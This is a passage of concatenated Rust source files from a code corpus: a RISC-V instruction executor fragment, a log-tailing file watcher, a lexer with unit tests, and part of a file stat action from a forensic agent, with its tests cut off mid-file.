x.r_isize(ci.rdrs1) >> shamt_c(ci.imm)?); }, Csrai64(_ci) => { // c.sraid? if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Candi(ci) => x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) & sext(ci.imm)), Csub(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) - x.r_usize(ca.rs2)); }, Cxor(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) ^ x.r_usize(ca.rs2)); }, Cor(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) | x.r_usize(ca.rs2)); }, Cand(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) & x.r_usize(ca.rs2)); }, Csubw(ca) => { x.w_sext32(ca.rdrs1, x.r_i32(ca.rdrs1).wrapping_sub(x.r_i32(ca.rs2))) }, Caddw(ca) => { x.w_sext32(ca.rdrs1, x.r_i32(ca.rdrs1).wrapping_add(x.r_i32(ca.rs2))) }, Cj(cj) => next_pc = pc + sext(cj.target), Cbeqz(cb) => { if x.r_usize(cb.rs1) == x.r_usize(0) { next_pc = pc + sext(cb.off) } }, Cbnez(cb) => { if x.r_usize(cb.rs1) != x.r_usize(0) { next_pc = pc + sext(cb.off) } }, Cslli(ci) => { x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) << shamt_c(ci.imm)?); }, Cslli64(_ci) => { // c.sllid? 
if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Cfldsp(_ci) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Clqsp(_ci) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Clwsp(ci) => { let addr = pc_to_mem_addr(x.r_usize(X2_SP) + sext(ci.imm)); let data = data_mem.read_i32(addr)?; x.w_sext32(ci.rdrs1, data); }, Cflwsp(_ci) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Cldsp(ci) => { if !has_x64() || !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } let addr = pc_to_mem_addr(x.r_usize(X2_SP) + sext(ci.imm)); let data = data_mem.read_i64(addr)?; x.w_sext64(ci.rdrs1, data); }, Cjr(cr) => next_pc = x.r_usize(cr.rdrs1), Cmv(cr) => x.w_usize(cr.rdrs1, x.r_usize(cr.rs2)), Cebreak(_cr) => todo!("ebreak"), Cjalr(cr) => { x.w_usize(X1_RA, next_pc); next_pc = x.r_usize(cr.rdrs1); }, Cadd(cr) => { x.w_usize(cr.rdrs1, x.r_usize(cr.rdrs1) + x.r_usize(cr.rs2)); }, Cfsdsp(_css) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Csqsp(_css) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Cswsp(css) => data_mem.write_u32( pc_to_mem_addr(x.r_usize(X2_SP) + sext(css.imm)), x.r_u32(css.rs2), )?, Cfswsp(_css) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Csdsp(css) => { if !has_x64() || !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } data_mem.write_u64( pc_to_mem_addr(x.r_usize(X2_SP) + sext(css.imm)), x.r_u64(css.rs2), )?; }, } Ok(next_pc) }
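// Minimal single-step sketch, assuming an already-decoded `Instruction` is available;
// fetching/decoding is out of scope here, and `Xlen::X64` is an arbitrary choice.
#[allow(dead_code)]
fn step_once<'a>(mem: &'a mut Physical<'a>, ins: Instruction, pc: Usize) -> Result<Usize> {
    // `execute` applies the architectural effects of `ins` and returns the next PC.
    let mut exec = Execute::new(mem, Xlen::X64);
    exec.execute(ins, pc)
}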
true
437141bc0a9638b2fc0e35cf864d38851ccb5326
Rust
kingxsp/filewatcher
/src/lib.rs
UTF-8
4,793
3.046875
3
[ "Apache-2.0" ]
permissive
use std::fs::File;
use std::io::SeekFrom;
use std::io::BufReader;
use std::io::prelude::*;
use std::os::unix::fs::MetadataExt;
use std::io::ErrorKind;

pub struct FileWatcher {
    filename: String,
    inode: u64,
    position: u64,
    reader: BufReader<File>,
    finish: bool
}

impl Clone for FileWatcher {
    fn clone(&self) -> FileWatcher {
        let file = File::open(&self.filename).unwrap();
        let mut reader = BufReader::new(file);
        reader.seek(SeekFrom::Start(self.position)).unwrap();
        FileWatcher {
            filename: self.filename.clone(),
            inode: self.inode,
            position: self.position,
            reader: reader,
            finish: self.finish,
        }
    }
}

pub enum Message {
    NONE,
    Line { inode: u64, position: u64, line: String }
}

impl FileWatcher {
    pub fn new(filename: String) -> Result<FileWatcher, ::std::io::Error> {
        let file = match File::open(filename.clone()) {
            Ok(f) => f,
            Err(err) => return Err(err)
        };
        let metadata = match file.metadata() {
            Ok(m) => m,
            Err(err) => return Err(err)
        };
        let mut reader = BufReader::new(file);
        let position = metadata.len();
        reader.seek(SeekFrom::Start(position)).unwrap();
        Ok(FileWatcher {
            filename: filename,
            inode: metadata.ino(),
            position: position,
            reader: reader,
            finish: false
        })
    }

    pub fn reposition(&mut self, inode: u64, start_pos: u64) -> Result<FileWatcher, &'static str> {
        if inode > 0 && self.inode != inode {
            return Err("last watcher file inode can't be matched!");
        }
        self.position = start_pos;
        self.reader.seek(SeekFrom::Start(self.position)).unwrap();
        Ok(self.clone())
    }

    pub fn get_filename(&mut self) -> String {
        self.filename.clone()
    }

    pub fn get_inode(&mut self) -> u64 {
        self.inode
    }

    pub fn get_position(&mut self) -> u64 {
        self.position
    }

    pub fn close(&mut self) {
        self.finish = true;
    }

    fn reopen(&mut self) {
        loop {
            match File::open(self.filename.clone()) {
                Ok(f) => {
                    let metadata = match f.metadata() {
                        Ok(m) => m,
                        Err(_) => { continue; }
                    };
                    self.reader = BufReader::new(f);
                    if metadata.ino() != self.inode {
                        self.position = 0;
                        self.inode = metadata.ino();
                    }
                    self.reader.seek(SeekFrom::Start(self.position)).unwrap();
                    break;
                },
                Err(err) => {
                    if err.kind() == ErrorKind::NotFound {
                        if self.finish {
                            break;
                        }
                        continue;
                    }
                }
            };
        }
    }

    fn read(&mut self) -> Option<Message> {
        let mut line = String::new();
        let resp = self.reader.read_line(&mut line);
        match resp {
            Ok(0) => {
                if self.finish {
                    None
                } else {
                    self.reopen();
                    Some(Message::NONE)
                }
            },
            Ok(len) => {
                if self.finish {
                    return None;
                }
                self.position += len as u64;
                self.reader.seek(SeekFrom::Start(self.position)).unwrap();
                Some(Message::Line {
                    inode: self.inode,
                    position: self.position,
                    line: line
                })
            },
            Err(err) => panic!("Can't read: {}", err)
        }
    }
}

impl Iterator for FileWatcher {
    type Item = Message;

    fn next(&mut self) -> Option<Message> {
        self.read()
    }
}

#[cfg(test)]
mod tests {
    use super::{FileWatcher, Message};

    #[test]
    fn it_works() {
        let mut times = 0;
        let mut watcher = match FileWatcher::new("Cargo.toml".to_string()) {
            Ok(w) => w,
            Err(err) => panic!("Can't read: {}", err)
        };
        let inode = watcher.inode;
        let mut watcher = match watcher.reposition(inode, 0) {
            Ok(w) => w,
            Err(err) => panic!("Can't reposition: {}", err)
        };
        loop {
            match watcher.next() {
                Some(Message::NONE) => {
                    println!("None None!!!");
                },
                Some(Message::Line { inode, position, line }) => {
                    println!("inode: {:?} position: {:?} line: {:?}", inode, position, line);
                },
                None => break
            }
            println!("filename: {:?}", watcher.get_filename());
            println!("file inode: {:?}", watcher.get_inode());
            println!("file position: {:?}", watcher.get_position());
            if times == 5 {
                watcher.close();
            }
            times += 1;
        }
    }
}
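// Minimal usage sketch, assuming the watched file already exists; "app.log" is a
// placeholder path. `new` seeks to the end of the file, so only data appended
// afterwards is reported.
#[cfg(test)]
mod usage_sketch {
    use super::{FileWatcher, Message};

    #[allow(dead_code)]
    fn tail_once() {
        let mut watcher = FileWatcher::new("app.log".to_string()).expect("open failed");
        match watcher.next() {
            Some(Message::Line { inode, position, line }) => {
                println!("inode {} pos {}: {}", inode, position, line.trim_end());
            }
            Some(Message::NONE) => println!("no new data yet"),
            None => println!("watcher closed"),
        }
        watcher.close();
    }
}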
true
6730004fb0160376db60b3ad0202430ea377b8df
Rust
Metastone/automaton-rules
/src/compiler/lexer.rs
UTF-8
12,020
3.640625
4
[ "MIT" ]
permissive
/// This module provides lexical analysis functions use std::fs::File; use std::io; use std::io::{BufReader, Read, Seek, SeekFrom}; use std::fmt; static DELIMITERS: [char; 5] = ['{', '}', '(', ')', ',']; static SINGLE_CHAR_OPERATORS: [char; 2] = ['<', '>']; static TWO_CHAR_OPERATORS: [&str; 6] = ["&&", "||", "==", "!=", "<=", ">="]; static OPERATOR_FIRST_CHARS: [char; 6] = ['&', '|', '=', '!', '<', '>']; pub struct Token { pub str: String, pub line: u32, pub column: u32 } impl Token { fn new(str: String, lexer: &Lexer) -> Token { let column = if lexer.current_char_in_token { lexer.current_column } else { lexer.previous_column }; let line = if lexer.current_char == '\n' { lexer.previous_line } else { lexer.current_line }; Token { str, line, column } } } impl fmt::Display for Token { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "\"{}\" - line {}, column {}", self.str, self.line, self.column) } } pub struct Lexer<'a> { reader: BufReader<File>, file_name: &'a str, previous_line: u32, previous_column: u32, current_line: u32, current_column: u32, current_char_in_token: bool, current_char: char } impl<'a> Lexer<'a> { pub fn new(file_name: &str) -> Result<Lexer, io::Error> { let file = File::open(file_name)?; let reader = BufReader::new(file); Ok(Lexer { reader, file_name, previous_line: 1, previous_column: 0, current_line: 1, current_column: 0, current_char_in_token: false, current_char: '\n' }) } pub fn get_next_token(&mut self) -> Result<Token, String> { // Read until a not-whitespace parameter is found. let mut c = self.read_char()?; while c.is_ascii_whitespace() && c != '\u{0}' { c = self.read_char()?; } // The token is a single delimiter character. if DELIMITERS.contains(&c) { return Ok(Token::new(c.to_string(), &self)); } // The token seems to be an operator. if OPERATOR_FIRST_CHARS.contains(&c) { return self.get_operator_token(c); } // The token should be a number or an alpha-numeric identifier (that doesn't start with a number). self.get_number_or_id_token(c) } fn get_operator_token(&mut self, c: char) -> Result<Token, String> { let mut token = String::new(); token.push(c); let expected_char = match c { '!' => '=', '<' => '=', '>' => '=', _ => c }; let c2 = self.read_char()?; token.push(c2); // The token is a two-characters operator if c2 == expected_char { Ok(Token::new(token, &self)) } // The token is a single character operator ('<' or '>') else if (c == '<' || c == '>') && (c2.is_ascii_whitespace() || c2 == '\u{0}' || c2.is_ascii_alphanumeric() || DELIMITERS.contains(&c2) || OPERATOR_FIRST_CHARS.contains(&c2)) { token.pop(); self.rewind_char()?; Ok(Token::new(token, &self)) } // The token starts as an operator but not one else { Err(format!("Invalid token {}. Note : recognized operators are {:?} and {:?}.", Token::new(token, &self), SINGLE_CHAR_OPERATORS, TWO_CHAR_OPERATORS)) } } fn get_number_or_id_token(&mut self, first_char: char) -> Result<Token, String> { let is_token_number = first_char.is_ascii_digit(); let is_token_identifier = first_char.is_ascii_alphabetic(); let mut rewind_one_char = false; let mut failure = false; let mut token = String::new(); let mut c = first_char; let mut dot_encountered = false; while !c.is_ascii_whitespace() && c != '\u{0}' { token.push(c); if is_token_number && !c.is_ascii_digit() { if DELIMITERS.contains(&c) || OPERATOR_FIRST_CHARS.contains(&c) { rewind_one_char = true; break; } else if c == '.' 
&& !dot_encountered { dot_encountered = true; } else { failure = true; } } if is_token_identifier && !c.is_ascii_alphanumeric() { if DELIMITERS.contains(&c) || OPERATOR_FIRST_CHARS.contains(&c) { rewind_one_char = true; break; } else { failure = true; } } c = self.read_char()?; } // The token is not a valid number or identifier if failure { return if is_token_number { Err(format!("Invalid token {}. It starts with a digit but is not a number.", Token::new(token, &self))) } else { Err(format!("Invalid token {}. It contains illegal characters.", Token::new(token, &self))) } } // No token found and we reached end-of-file if token.is_empty() && c == '\u{0}' { return Ok(Token::new(String::new(), &self)) } // The last character is nor part of the token, we just have to un-read it and we are good. if rewind_one_char { token.pop(); self.rewind_char()?; } // Token is a valid number or identifier Ok(Token::new(token, &self)) } fn read_char(&mut self) -> Result<char, String> { let mut buffer = [0; 1]; match self.reader.read(&mut buffer) { Ok(_) => { self.current_char = buffer[0] as char; self.current_char_in_token = !(self.current_char.is_ascii_whitespace() || self.current_char == '\u{0}'); if self.current_char == '\n' { self.previous_line = self.current_line; self.previous_column = self.current_column; self.current_line += 1; self.current_column = 0; } else { self.previous_column = self.current_column; self.current_column += 1; } } Err(e) => { return Err(format!("Cannot read character from file {} (line {}, column {}). Cause : {:?}", self.file_name, self.current_line, self.current_column, e)) } } Ok(buffer[0] as char) } fn rewind_char(&mut self) -> Result<(), String> { if let Err(error) = self.reader.seek(SeekFrom::Current(-1)) { return Err(format!("Could not get token (line {}, column {}). 
Cause : {:?}", self.previous_line, self.previous_column, error)); } if self.current_char == '\n' { self.current_line = self.previous_line; } self.current_column = self.previous_column; self.current_char_in_token = true; Ok(()) } } // TODO Add tests for line and columns feature, current tests are not enough #[cfg(test)] mod tests { use crate::compiler::lexer::{Lexer, SINGLE_CHAR_OPERATORS, TWO_CHAR_OPERATORS}; static BENCH_NICE_FILE: &str = "resources/tests/lexer_benchmark_nice.txt"; static BENCH_UGLY_FILE: &str = "resources/tests/lexer_benchmark_ugly.txt"; static NON_EXISTING_FILE: &str = "resources/tests/does_not_exist.txt"; static OPERATOR_TYPO_FILE: &str = "resources/tests/lexer_operator_typo.txt"; static NB_WITH_TWO_DOTS_FILE: &str = "resources/tests/lexer_number_with_two_dots.txt"; static NB_WITH_ALPHABETIC_FILE: &str = "resources/tests/lexer_number_with_alphabetic.txt"; static ID_WITH_ILLEGAL_CHAR_FILE: &str = "resources/tests/lexer_id_with_illegal_char.txt"; #[test] fn tokenize_benchmark_nice_succeeds() { let mut lexer = Lexer::new(BENCH_NICE_FILE).unwrap(); check_benchmark_output(&mut lexer); } #[test] fn tokenize_benchmark_ugly_succeeds() { let mut lexer = Lexer::new(BENCH_UGLY_FILE).unwrap(); check_benchmark_output(&mut lexer); } fn check_benchmark_output(lexer: &mut Lexer) { assert_eq!(lexer.get_next_token().unwrap().str, "th15I5AnAlphanum3r1cId3nt1f1er"); assert_eq!(lexer.get_next_token().unwrap().str, "thisTooAndNextUpIsANumber"); assert_eq!(lexer.get_next_token().unwrap().str, "123456"); assert_eq!(lexer.get_next_token().unwrap().str, "<"); assert_eq!(lexer.get_next_token().unwrap().str, ">"); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert_eq!(lexer.get_next_token().unwrap().str, "<="); assert_eq!(lexer.get_next_token().unwrap().str, ">="); assert_eq!(lexer.get_next_token().unwrap().str, "&&"); assert_eq!(lexer.get_next_token().unwrap().str, "||"); assert_eq!(lexer.get_next_token().unwrap().str, "=="); assert_eq!(lexer.get_next_token().unwrap().str, "!="); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert_eq!(lexer.get_next_token().unwrap().str, ","); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert_eq!(lexer.get_next_token().unwrap().str, "("); assert_eq!(lexer.get_next_token().unwrap().str, ")"); assert_eq!(lexer.get_next_token().unwrap().str, "{"); assert_eq!(lexer.get_next_token().unwrap().str, "}"); assert_eq!(lexer.get_next_token().unwrap().str, "3.14"); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert!(lexer.get_next_token().unwrap().str.is_empty()); assert!(lexer.get_next_token().unwrap().str.is_empty()); } #[test] fn tokenize_no_file_fails() { match Lexer::new(NON_EXISTING_FILE) { Err(io_error) => assert!(io_error.to_string().contains("No such file or directory")), _ => assert!(false), } } #[test] fn tokenize_operator_typo_fails() { let mut lexer = Lexer::new(OPERATOR_TYPO_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, format!( "Invalid token \"|-\" - line 1, column 2. Note : recognized operators are {:?} and {:?}.", SINGLE_CHAR_OPERATORS, TWO_CHAR_OPERATORS)), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } #[test] fn tokenize_number_with_two_dots_fails() { let mut lexer = Lexer::new(NB_WITH_TWO_DOTS_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, "Invalid token \"1.000.000\" - line 1, column 9. 
It starts with a digit but is not a number."), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } #[test] fn tokenize_number_with_alphabetic_fails() { let mut lexer = Lexer::new(NB_WITH_ALPHABETIC_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, "Invalid token \"10O0\" - line 1, column 4. It starts with a digit but is not a number."), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } #[test] fn tokenize_id_with_illegal_char_fails() { let mut lexer = Lexer::new(ID_WITH_ILLEGAL_CHAR_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, "Invalid token \"hello_world\" - line 1, column 11. It contains illegal characters."), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } }
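// Minimal usage sketch, assuming the convention exercised by the benchmark tests
// above that an empty token string marks end-of-file; the file name comes from the caller.
#[cfg(test)]
mod usage_sketch {
    use super::Lexer;

    #[allow(dead_code)]
    fn dump_tokens(file_name: &str) -> Result<(), String> {
        let mut lexer = Lexer::new(file_name).map_err(|e| e.to_string())?;
        loop {
            let token = lexer.get_next_token()?;
            if token.str.is_empty() {
                return Ok(());
            }
            // Uses the `Display` impl: "str" - line L, column C.
            println!("{}", token);
        }
    }
}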
true
2fb3ca2c0bc8952c78c7dad0a5f733a77cbe5acd
Rust
google/rrg
/crates/rrg/src/action/deprecated/stat.rs
UTF-8
19,541
2.671875
3
[ "MIT" ]
permissive
// Copyright 2020 Google LLC // // Use of this source code is governed by an MIT-style license that can be found // in the LICENSE file or at https://opensource.org/licenses/MIT. //! A handler and associated types for the file stat action. //! //! A file stat action collects filesystem metadata associated with a particular //! file. //! //! Note that the gathered bits of information differ across platforms, e.g. on //! Linux there is a notion of symlinks whereas on Windows no such thing exists. //! Therefore, on Linux the results might include additional information about //! the symlink (like the file it points to). use std::fs::Metadata; use std::path::PathBuf; use rrg_macro::ack; use crate::session::{self, Session}; /// A request type for the stat action. #[derive(Debug)] pub struct Request { /// A path to the file to stat. path: PathBuf, /// Whether to collect extended file attributes. collect_ext_attrs: bool, /// Whether, in case of a symlink, to collect data about the linked file. follow_symlink: bool, } impl Request { /// Obtains a (potentially expanded) path that this request corresponds to. /// /// In case of requests that wish to follow symlinks, it will return a path /// to the symlink target (in case there is such). Otherwise, it will just /// return the requested path unchanged. /// /// # Errors /// /// This method will return an error if the path needs to be expanded but /// the expansion fails for some reason (e.g. the requested path does not /// exist). fn target(&self) -> std::io::Result<std::borrow::Cow<PathBuf>> { use std::borrow::Cow::*; if self.follow_symlink { self.path.canonicalize().map(Owned) } else { Ok(Borrowed(&self.path)) } } } /// A response type for the stat action. #[derive(Debug)] pub struct Response { /// A path to the file that the result corresponds to. path: PathBuf, /// Metadata about the file. metadata: Metadata, /// A path to the pointed file (in case of a symlink). symlink: Option<PathBuf>, /// Extended attributes of the file. ext_attrs: Vec<ospect::fs::ExtAttr>, /// Additional Linux-specific file flags. #[cfg(target_os = "linux")] flags_linux: Option<u32>, // TODO: Add support for collecting file flags on macOS. } /// An error type for failures that can occur during the stat action. #[derive(Debug)] enum Error { /// A failure occurred during the attempt to collect file metadata. Metadata(std::io::Error), } impl std::error::Error for Error { fn source(&self) -> Option<&(dyn std::error::Error + 'static)> { use Error::*; match *self { Metadata(ref error) => Some(error), } } } impl std::fmt::Display for Error { fn fmt(&self, fmt: &mut std::fmt::Formatter) -> std::fmt::Result { use Error::*; match *self { Metadata(ref error) => { write!(fmt, "unable to collect metadata: {}", error) } } } } impl From<Error> for session::Error { fn from(error: Error) -> session::Error { session::Error::action(error) } } /// Handles requests for the file stat action. pub fn handle<S>(session: &mut S, request: Request) -> session::Result<()> where S: Session, { let metadata = if request.follow_symlink { std::fs::metadata(&request.path) } else { std::fs::symlink_metadata(&request.path) }.map_err(Error::Metadata)?; let symlink = if metadata.file_type().is_symlink() { ack! { std::fs::read_link(&request.path), warn: "failed to read symlink for '{}'", request.path.display() } } else { None }; let ext_attrs = if request.collect_ext_attrs { ext_attrs(&request) } else { vec!() }; #[cfg(target_os = "linux")] let flags_linux = if !metadata.file_type().is_symlink() { ack! 
{ ospect::fs::linux::flags(&request.path), warn: "failed to collect flags for '{}'", request.path.display() } } else { // Flags are available only for non-symlinks. For symlinks, the function // would return flags mask for the target file, which can look confusing // in the results. None }; let response = Response { path: request.path, metadata: metadata, symlink: symlink, ext_attrs: ext_attrs, #[cfg(target_os = "linux")] flags_linux: flags_linux, }; session.reply(response)?; Ok(()) } impl crate::request::Args for Request { type Proto = rrg_proto::jobs::GetFileStatRequest; fn from_proto(mut proto: Self::Proto) -> Result<Self, crate::request::ParseArgsError> { let path = proto.take_pathspec().try_into() .map_err(|error| { crate::request::ParseArgsError::invalid_field("pathspec", error) })?; Ok(Request { path: path, follow_symlink: proto.get_follow_symlink(), collect_ext_attrs: proto.get_collect_ext_attrs(), }) } } impl crate::response::Item for Response { type Proto = rrg_proto::jobs::StatEntry; fn into_proto(self) -> Self::Proto { use rrg_proto::convert::FromLossy as _; let mut proto = rrg_proto::jobs::StatEntry::from_lossy(self.metadata); proto.set_pathspec(self.path.into()); if let Some(symlink) = self.symlink { proto.set_symlink(symlink.to_string_lossy().into_owned()); } proto.set_ext_attrs(self.ext_attrs.into_iter().map(Into::into).collect()); #[cfg(target_os = "linux")] if let Some(flags_linux) = self.flags_linux { proto.set_st_flags_linux(flags_linux); } proto } } /// Collects extended attributes of a file specified by the request. fn ext_attrs(request: &Request) -> Vec<ospect::fs::ExtAttr> { let path = match request.target() { Ok(path) => path, Err(error) => { rrg_macro::warn! { "failed to expand '{path}': {cause}", path = request.path.display(), cause = error }; return vec!(); } }; let ext_attrs = match ospect::fs::ext_attrs(&path) { Ok(ext_attrs) => ext_attrs, Err(error) => { rrg_macro::warn! { "failed to collect extended attributes for '{path}': {cause}", path = request.path.display(), cause = error }; return vec!(); } }; ext_attrs.filter_map(|ext_attr| match ext_attr { Ok(ext_attr) => Some(ext_attr), Err(error) => { rrg_macro::warn! { "failed to collect an extended attribute for '{path}': {cause}", path = request.path.display(), cause = error }; None } }).collect() } #[cfg(test)] mod tests { use std::fs::File; use super::*; #[test] fn test_handle_with_non_existent_file() { let tempdir = tempfile::tempdir().unwrap(); let request = Request { path: tempdir.path().join("foo").to_path_buf(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_err()); } #[test] fn test_handle_with_regular_file() { let tempdir = tempfile::tempdir().unwrap(); File::create(tempdir.path().join("foo")).unwrap(); let request = Request { path: tempdir.path().join("foo").to_path_buf(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, tempdir.path().join("foo")); assert!(reply.metadata.is_file()); } // Symlinking is supported only on Unix-like systems. 
#[cfg(target_family = "unix")] #[test] fn test_handle_with_link() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); let request = Request { path: symlink.clone(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink); assert_eq!(reply.symlink, Some(target)); assert!(reply.metadata.file_type().is_symlink()); } // Symlinking is supported only on Unix-like systems. #[cfg(target_family = "unix")] #[test] fn test_handle_with_two_links() { use std::os::unix::fs::symlink; let tempdir = tempfile::tempdir().unwrap(); let symlink_to_symlink = tempdir.path().join("foo"); let symlink_to_target = tempdir.path().join("bar"); let target = tempdir.path().join("baz"); File::create(&target).unwrap(); symlink(&target, &symlink_to_target).unwrap(); symlink(&symlink_to_target, &symlink_to_symlink).unwrap(); let request = Request { path: symlink_to_symlink.clone(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink_to_symlink); assert_eq!(reply.symlink, Some(symlink_to_target)); assert!(reply.metadata.file_type().is_symlink()); } // Symlinking is supported only on Unix-like systems. #[cfg(target_family = "unix")] #[test] fn test_handle_with_link_and_follow_symlink() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); let request = Request { path: symlink.clone(), follow_symlink: true, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink); assert_eq!(reply.symlink, None); assert!(reply.metadata.is_file()); } // Symlinking is supported only on Unix-like systems. #[cfg(target_family = "unix")] #[test] fn test_handle_with_two_links_and_follow_symlink() { use std::os::unix::fs::symlink; let tempdir = tempfile::tempdir().unwrap(); let symlink_to_symlink = tempdir.path().join("foo"); let symlink_to_target = tempdir.path().join("bar"); let target = tempdir.path().join("baz"); File::create(&target).unwrap(); symlink(&target, &symlink_to_target).unwrap(); symlink(&symlink_to_target, &symlink_to_symlink).unwrap(); let request = Request { path: symlink_to_symlink.clone(), follow_symlink: true, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink_to_symlink); assert_eq!(reply.symlink, None); assert!(reply.metadata.is_file()); } #[cfg(all(target_os = "linux", feature = "test-setfattr"))] #[test] fn test_handle_with_file_ext_attrs_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let tempfile = tempdir.path().join("foo"); std::fs::File::create(&tempfile).unwrap(); assert! 
{ std::process::Command::new("setfattr") .arg("--name").arg("user.norf") .arg("--value").arg("quux") .arg(&tempfile) .status() .unwrap() .success() }; let request = Request { path: tempfile.clone(), follow_symlink: false, collect_ext_attrs: true, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.ext_attrs.len(), 1); assert_eq!(reply.ext_attrs[0].name, "user.norf"); assert_eq!(reply.ext_attrs[0].value, b"quux"); } #[cfg(all(target_os = "linux", feature = "test-setfattr"))] #[test] fn test_handle_with_symlink_ext_attrs_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); // Turns out, the kernel disallows setting extended attributes on a // symlink [1]. However, the kernel itself can hypothetically set such // bits. // // In order to verify that we really collect attributes for the symlink // and no for the target, we set some attributes for the target and then // we collect attributes of the symlink. Then, the expected result is to // have a reply with no extended attributes. // // [1]: https://man7.org/linux/man-pages/man7/xattr.7.html assert! { std::process::Command::new("setfattr") .arg("--name").arg("user.norf") .arg("--value").arg("quux") .arg("--no-dereference") .arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink, follow_symlink: false, collect_ext_attrs: true, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert!(reply.ext_attrs.is_empty()); } #[cfg(all(target_os = "linux", feature = "test-setfattr"))] #[test] fn test_handle_with_symlink_ext_attrs_and_follow_symlink_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); assert! { std::process::Command::new("setfattr") .arg("--name").arg("user.norf") .arg("--value").arg("quux") .arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink.clone(), follow_symlink: true, collect_ext_attrs: true, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.ext_attrs.len(), 1); assert_eq!(reply.ext_attrs[0].name, "user.norf"); assert_eq!(reply.ext_attrs[0].value, b"quux"); } #[cfg(all(target_os = "linux", feature = "test-chattr"))] #[test] fn test_handle_with_file_flags_on_linux() { // https://elixir.bootlin.com/linux/v5.8.14/source/include/uapi/linux/fs.h#L245 const FS_NOATIME_FL: std::os::raw::c_long = 0x00000080; let tempdir = tempfile::tempdir().unwrap(); let tempfile = tempdir.path().join("foo"); std::fs::File::create(&tempfile).unwrap(); assert! 
